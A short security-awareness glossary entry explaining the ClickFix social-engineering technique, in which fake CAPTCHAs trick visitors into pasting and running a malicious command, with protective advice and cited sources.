ClickFix

ClickFix is a social-engineering technique where a fake CAPTCHA or error message gets visitors to run a copied malicious command themselves. Because the victim launches the command, the attack needs no technical vulnerability.

ClickFix is a form of social engineering in which a prepared web page fakes a problem, usually a cloned CAPTCHA or a browser error message. It tells visitors to run a short key sequence and thereby installs malware without exploiting a single technical flaw.

How does a ClickFix attack work?

As soon as a visitor clicks the fake prompt, a script copies a command to the clipboard in the background (clipboard hijacking). The instructions then ask the visitor to run it themselves, on Windows through the Run dialog (Win + R, then Ctrl + V, then Enter), on macOS through Terminal. The command uses a legitimate Windows program such as powershell.exe to download an infostealer.

Why is ClickFix so effective?

ClickFix exploits no software flaw, only the trust people place in familiar prompts. Because the victim runs the command, traditional security software often sees nothing more than a normal user action. Switzerland’s BACS has reported a rise in ClickFix cases since early 2026.

How do you protect yourself against ClickFix?

Never paste a command from a website into PowerShell, a terminal, or the Run dialog. A real CAPTCHA never asks for a system-level key combination. For how the attack spreads, what the numbers say, and what organizations can do, see our full article How Fake CAPTCHAs Fuel ClickFix Attacks.

Sources

BACS / NCSC.ch, Week 8: “ClickFix” (24.02.2026)
Microsoft Security Blog, Think before you Click(Fix) (21.08.2025)

Related Terms

Social Engineering Phishing Malware